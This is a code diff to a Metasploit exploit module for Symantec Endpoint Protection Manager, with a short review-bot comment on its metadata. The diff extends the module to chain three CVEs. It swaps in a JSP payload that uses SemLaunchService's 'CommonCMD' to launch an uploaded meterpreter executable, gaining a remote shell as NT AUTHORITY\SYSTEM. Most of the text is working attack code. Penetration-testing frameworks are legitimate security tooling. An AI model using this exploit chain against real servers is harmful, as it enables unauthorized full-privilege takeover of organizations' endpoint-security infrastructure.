diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
index d4016a267d..a66b8a9fa8 100644
--- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
+++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb
@@ -15,8 +15,8 @@ class Metasploit3 < Msf::Exploit::Remote
 super(update_info(info,
 'Name' => "Symantec Endpoint Protection Manager Auth Bypass and RCE",
 'Description' => %q{
- This module exploits two separate vulnerabilities in Symantec Endpoint Protection Manager
- in order to achieve a remote shell on the box.
+ This module exploits three separate vulnerabilities in Symantec Endpoint Protection Manager
+ in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM
 },
 'License' => MSF_LICENSE,
 'Author' =>
@@ -28,6 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
 [
 ['CVE', '2015-1486'],
 ['CVE', '2015-1487'],
+ ['CVE', '2015-1489'],
 ['URL', 'http://codewhitesec.blogspot.com/2015/07/symantec-endpoint-protection.html']
 ],
 'Payload' => { 'BadChars' => "\x0d\x0a\x00" },
@@ -41,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
 }
 }
 ],
 ],
- 'Privileged' => false,
+ 'Privileged' => true,
 'DisclosureDate' => 'Jul 31 2015',
 'DefaultTarget' => 0))
@@ -73,7 +74,9 @@ class Metasploit3 < Msf::Exploit::Remote
 cookie = res.get_cookies
- exec = '<%=new java.util.Scanner(Runtime.getRuntime().exec(System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\'+meterp+'.exe").getInputStream()).useDelimiter("\\\\A").next()%>'
+ exec = %Q{<%@page import="java.io.*,java.util.*,com.sygate.scm.server.util.*"%>
<%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %>
+ }
 send_request_cgi({
 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
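Review bot: `'Privileged' => true` in the third hunk tells the framework that sessions come back elevated, but nothing in the metadata records where that guarantee comes from, and the enclosing `initialize` begins before the hunk, so a reader sees only the flag flip. Presumably it rests on the `SemLaunchService` `CommonCMD` path introduced in the last hunk executing under the SEPM service account, which is an assumption about the target rather than anything the module checks, so a why-comment next to the flag would help: `# shell is spawned through SemLaunchService, which runs as the SEPM service account (SYSTEM)`. The rewritten description line in the first hunk also lost its terminating period; `in order to achieve a remote shell on the box as NT AUTHORITY\SYSTEM.` restores it (the backslash is literal inside `%q{}`).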